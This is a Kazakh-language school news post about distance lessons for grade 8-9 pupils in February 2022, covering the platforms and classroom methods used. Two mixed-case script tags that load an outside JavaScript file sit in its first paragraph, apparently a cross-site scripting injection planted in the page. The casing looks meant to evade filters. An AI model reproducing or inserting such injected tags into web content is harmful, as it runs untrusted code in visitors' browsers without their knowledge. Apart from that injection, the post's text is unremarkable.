2021-2022 оқу жылында 1-11 ақпан аралығында Ж.Бектұров атындағы №3 ЖОББМ ресурстық орталықта магниттік мектептердің 8-9 сыныптағы оқушылар негізгі пәндер бойынша қашықтықтан оқытылды. мұғалімдер түрлі әдіс-тәсіл және платформалармен жұмыс жасады.<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

05.03.2022

Қашықтықтан оқытылуда ZOOM, ОnlineMektep, Kahoot!, Jamboard тағы да көптеген платформа мен қосымшаларды сабақта кеңінен қолданды. Олқылықтарды жою мақсатында түрлі әдіс-тәсілдерді пайдаланып, оқушылардың білім сапасын арттырды. Әр күнгі сабақтарға көрнекілік ретінде презентациялар қолданылды. Сабақтарды өткізу барысында әртүрлі әдіс–тәсілдер пайдаланылды. Атап айтатын болсам «Танысу тренингі», «Мағынаны ашу», «Перфокартамен жұмыс», «Семантикалық карта», «GO TO» ойыны,  «Формула әлемі» сәйкестендіру, «Білемін, білмеймін», «Не білемін, не үйрендім, не білгім келеді», «Бес бармақ», «Математикалық диктант», Топтастыру, Венн диаграммасы, ДОМИНО, кластер толтыру, эссе жазу сияқты әдіс-тәсілдер. Сабақ барысында оқушылармен жеке жұмыстар, жұптық жұмыстар ұйымдастырылды, оларға  деңгейлік тапсырмалар, тест тапсырмалары ұсынылды. Тапсырмалар қызықты болу үшін басқа пәндермен байланыстырылып, қызықты мәліметтер берілді. Әр сабақтан кейін кері байланыс алынып, оқушылардың алған білімдерін бағалау мақсатында үй жұмыстары беріліп отырды.

Просмотров: 322


Пікір қосу



Деректерді қолтаңбаға қосу